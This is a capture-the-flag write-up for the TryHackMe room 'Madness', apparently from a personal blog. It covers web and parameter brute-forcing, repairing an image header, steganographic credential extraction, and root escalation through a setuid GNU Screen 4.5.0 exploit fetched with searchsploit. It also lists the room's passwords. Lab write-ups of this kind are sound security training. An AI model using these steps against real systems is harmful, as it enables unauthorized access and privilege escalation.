TryHackMeEasy
TryHackMe - Madness
websteganographybrute-forceprivesclinuxscreen
🎯 Challenge Overview
Madness is a TryHackMe room that combines web enumeration, file header manipulation, steganography extraction, and exploiting a vulnerable SUID binary for privilege escalation.
Attack Chain:
- Reconnaissance → Web enumeration and source code inspection
- File Analysis → Fix corrupted image header (PNG → JPEG)
- Parameter Bruteforce → Discover hidden secret value
- Steganography → Extract hidden credentials from image
- Privilege Escalation → Exploit vulnerable GNU Screen 4.5.0
📡 Enumeration
Port Scanning
BASH
nmap -sC -sV -oN nmap.log 10.10.10.10Results:
TEXT
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpNote: The room description explicitly mentions that SSH brute-forcing is not required.
🌐 Web Enumeration
Visiting the web server on port 80 reveals the Apache2 Default Page.
Directory Brute-force
BASH
feroxbuster -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txtNo useful directories were found through traditional enumeration.
🔍 Initial Clue: Broken Image
While inspecting the page source, a broken image was found along with a suspicious comment:
"They will never find me"
The image was located at /thm.jpg
📁 File Analysis: Corrupted Header
Downloading the image:
BASH
curl http://10.10.10.10/thm.jpg -o thm.jpgOpening the file failed. Running exiftool revealed something odd:
| Property | Value |
|---|---|
| File extension | JPG |
| File header | PNG |
| Warning | PNG image did not start with IHDR |
This indicates file header manipulation - the file claims to be a JPEG but has a corrupted PNG header.
🔧 Fixing the Image Header
Using a hex editor (e.g., ghex, hexedit), the corrupted header was replaced with a valid JPEG header:
TEXT
FF D8 FF E0 00 10 4A 46 49 46After fixing the header, the image opened successfully and revealed a hidden directory.
🗂️ Hidden Directory Discovery
Navigating to the revealed directory:
TEXT
/th1s_1s_h1dd3nThe page prompts us to guess a secret. Viewing the source code shows a comment hinting that the secret is between 0–99.
🔐 Brute-forcing the Secret
Appending a parameter ?secret=0 returns "wrong", confirming the mechanism.
Method 1 — FFUF
BASH
# Generate wordlist
seq 0 99 > nums.txt
# Fuzz the parameter
ffuf -u http://10.10.10.10/th1s_1s_h1dd3n/?secret=FUZZ -w nums.txtOne request returned a different response length:
TEXT
secret=73Method 2 — Burp Suite Intruder
Alternatively, using Burp Suite Intruder with a numeric payload (0–99) for the secret parameter and filtering by response length confirmed the same value.
Secret Confirmed
Navigating to:
TEXT
/th1s_1s_h1dd3n/?secret=73Reveals a password string:
TEXT
y2RPJ4QaPF!B🕵️ Steganography Extraction
Now that we have a password, we revisit thm.jpg:
BASH
steghide extract -sf thm.jpg
# Enter passphrase: y2RPJ4QaPF!BHidden message revealed:
TEXT
Here's a username
wbxre🔄 Decoding the Username
The username wbxre is ROT13-encoded:
BASH
echo "wbxre" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
# Output: jokerRoom Page Image Stego
The image shown on the TryHackMe room page itself also contains hidden data!
BASH
stegseek 5iW7kC8.jpg rockyou.txtExtracted message:
TEXT
I didn't think you'd find me!
Here take my password
*axA&GF8dP🚩 User Flag
Using the discovered credentials:
TEXT
Username: joker
Password: *axA&GF8dP
BASH
ssh joker@10.10.10.10
cat ~/user.txt🚀 Privilege Escalation
Enumeration
BASH
# Check sudo permissions
sudo -l
# Nothing useful
# Check SUID binaries
find / -perm -4000 2>/dev/nullOne entry stands out:
TEXT
/bin/screen-4.5.0💥 Exploiting GNU Screen (CVE-2017-5618)
screen version 4.5.0 is known to be vulnerable when installed setuid root.
BASH
screen --version
# Screen version 4.5.0Finding an Exploit
BASH
searchsploit screen 4.5.0
searchsploit -m 41154.shExploitation
BASH
scp 41154.sh joker@10.10.10.10:/home/joker
chmod +x 41154.sh
./41154.sh⚠️ Troubleshooting: CRLF Line Endings
On my first attempt, the exploit failed with a confusing error:
BASH
joker@ubuntu:~$ ./41154.sh
-bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directoryWhat went wrong?
The script had Windows-style line endings (CRLF) instead of Unix-style line endings (LF). The ^M character at the end of /bin/bash is the carriage return (\r) that Windows adds. Linux doesn't recognize /bin/bash\r as a valid interpreter.
The Fix:
BASH
# Install dos2unix (if not already installed)
sudo apt-get install dos2unix
# Convert the script to Unix line endings
dos2unix 41154.sh
# Re-transfer to target machine
scp 41154.sh joker@10.10.10.10:/home/joker
# Now it works!
./41154.shLesson Learned: Always check for CRLF issues when transferring scripts between Windows and Linux. Tools like
dos2unix,sed, or evenvimcan fix this.
After fixing the line endings, the exploit successfully spawns a root shell!
🚩 Root Flag
BASH
cat /root/root.txt🏆 Flags Summary
| Flag | Location | Status |
|---|---|---|
| User Flag | /home/joker/user.txt |
Captured |
| Root Flag | /root/root.txt |
Captured |
🛠️ Tools Used
| Tool | Purpose |
|---|---|
nmap |
Port scanning and service enumeration |
feroxbuster |
Directory brute-forcing |
ffuf |
Parameter fuzzing |
ghex / hexedit |
Hex editing to fix file headers |
steghide |
Steganography extraction |
stegseek |
Stego brute-forcing |
searchsploit |
Exploit discovery |
📝 Key Takeaways
- Source code inspection can reveal hidden comments and resources
- File headers can be manipulated - always verify with
fileandexiftool - Parameter brute-forcing is effective for small numeric ranges
- Multiple steganography layers may exist across different images
- ROT13 is a common encoding in CTFs
- SUID binaries should always be checked for known vulnerabilities
- Room page images on CTF platforms can contain additional clues